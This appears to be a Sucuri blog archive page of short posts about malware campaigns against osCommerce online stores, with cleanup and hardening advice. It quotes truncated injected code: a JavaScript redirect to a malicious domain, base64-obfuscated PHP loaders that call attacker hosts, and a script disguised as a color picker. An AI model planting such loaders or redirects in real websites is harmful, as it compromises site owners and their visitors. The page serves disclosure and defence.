Protect Your Interwebs!
The malware attacks against osCommerce sites are still going at full force and the site owners have to take action to secure and update their sites as soon as possible. Think about that, with so many valuable targets (online stores) that are not updated and secured, why would they stop attacking now?
*If you have an osCommerce site, please follow these steps to make sure it doesn’t keep getting hacked. You can also scan it to check if it’s clean: Sucuri SiteCheck
It seems that the attacks against osCommerce are not going to stop any time soon. With so many valuable targets (online stores) that are not updated and secured, why would they?
This is what shows up on a compromised site:
Read More
We have been posting for a while about attacks targeting and infecting thousands of osCommerce sites (CreateCSS, div_colors, etc) and the importance of keeping it updated and secure.
If you think things have been improving, just for the last few days we started to see many of those osCommerce sites that were hacked, generating errors when trying to access them:
Read More
Busy week for osCommerce in terms of malware. First, the div_colors string, then, the CreateCSS string, and now, we are seeing thousands of osCommerce sites infected with a malware pointing to http://khcol.com. This is how it looks like in an infected site:
<script type="text/javascript">document.location = "http://khcol.com/page/?ref=aHR0cDovL2FtZXJ…..tL2FkbWluLw=="
This javascript is generated by the following code added to the bottom of all PHP files in the server:
<?php if(!isset($tf['engine'])){$tf['engine']=1;$tf['s']=base64_decode(‘a2hjb2wuY29t’);$tf['u']=’http://’.$tf['s']…
We are still seeing a big growth in the number of sites infected with the div_colors malware string. In fact, the osCommerce forums are full of people asking about it, uncertain what to do, and what it does.
So, what is this div_colors stuff? It is malware that targets osCommerce installations and added the following obfuscated code to the pages:
if (typeof(redef_colors)==”undefined”) {
var div_colors = new Array("#4b8272′, "#81787f’, ‘#832f83′, ‘#887f74′, ‘#4c3183′, ‘#748783′, ‘#3e7970′, ‘#857082′, ‘#728178′, ‘#7f8331′, ‘#2f8281′, ‘#724c31′, ‘#778383′, ‘#7f493e’, ‘#3e7a84′, ‘#82837e’, ‘#40403d’, ‘#727e7c’, ‘#3e7982′, ‘#3e7980′, ‘#847481′, ‘#883d7c’, ‘#787d3d’, ‘#7f777f’, "#314d00′);..
var redef_colors = 1;
var colors_picked = 0;function div_pick_colors(t,styled) {
..
We are starting to see an interesting trend regarding how the latest web-based malware is being distributed. Instead of heavily encoding the malicious code on the infected web sites, attackers are now trying to make it look like legitimate code.
For example, the div_colors malware that infected a lot of osCommerce sites, looks like a javascript color picker. This is how it looks like in an infected site:
if (typeof(redef_colors)==”undefined”) {
var div_colors = new Array("#4b8272′, "#81787f’, ‘#832f83′, ‘#887f74′, ‘#4c3183′, ‘#748783′, ‘#3e7970′, ‘#857082′, ‘#728178′, ‘#7f8331′, ‘#2f8281′, ‘#724c31′, ‘#778383′, ‘#7f493e’, ‘#3e7a84′, ‘#82837e’, ‘#40403d’, ‘#727e7c’, ‘#3e7982′, ‘#3e7980′, ‘#847481′, ‘#883d7c’, ‘#787d3d’, ‘#7f777f’, "#314d00′);
Weekly malware update. You can track all updates by following our malware_updates category.
For the last few weeks, this attack has been the most common, specially targetting osCommerce sites. The following code is added to the bottom of the infected pages:
Read More
We posted yesterday about a series of attacks against osCommerce sites using some russian domains to push the malware (generally the fake AV). We also posted details on how to fix and secure osCommerce to protect against those:
http://blog.sucuri.net/2010/11/continuing-attacks-against-oscommerce-sites.html
However, they are not the only ones targeting osCommerce. There is another group using many .in web sites (always registered by Jennifer Hook – veriandjsad@comcast.net) that are infecting thousands of sites too.
When they detect an vulnerable site (see previous post by details on that), they drop a backdoor, generally named google*.php that will allow them to manage the site remotely. You can see the full backdoor here (caught by our honeypots):
http://sucuri.net/?page=tools&title=blacklist&detail=1205dd32a1004a65ecc4d4441474217d
It is interesting that in addition to give full shell access to the attackers, it also uses http://redserver.com.ua/code.txt to read the list of domains to use in the attack. Currently, these are the ones being used:
Read More
We are seeing an increase in the number of osCommerce sites hacked lately, and we recommend anyone using it to take precautions to avoid getting hacked and/or reinfected.
On most of the sites we’ve analyzed so far, the attackers used the file_manager.php vulnerability to hack the site.
If you’re using osCommerce, the first thing you have to do is to install the latest version. Second, remove the file_manager.php file and then rename your admin directory to something else: login via FTP or SSH(recommended) to do so
ftp> delete admin/file_manager.php
ftp> rename admin admin-random-folder-name
ftp> cd admin-random-folder-name/includes
ftp> get configure.php
Once you do that, modify your configure.php to point the admin folder to the new location.
Read More
Quick malware update: We are seeing many osCommerce sites infected with malware managed by inininininininin.in, comcomcomcomcomcom.com and a few others. All the domains involved are hosted at 91.204.48.45.
These domains were registered by myid37@gmail.com, which is also involved on other malicious activities (serials-keys.com, wincrack.org, search-crack.org,etc).
The infected sites had a large encoded entry added to the file includes/header.php:
echo(base64_decode(“ZnVuY3Rpb24gczM3KCRzKXtmb3IgKCRhID0gMDsgJGEgPD…
Which when decoded, calls http://inininininininin.in/in.php to get what malware to present to the end user:
Read More
Receive new posts in your inbox.
Copyright © 2013 Sucuri Inc. · Terms of Service · Privacy Policy
Sucuri® is a registered trademark of Sucuri Inc. in the United States and/or other countries.
Comments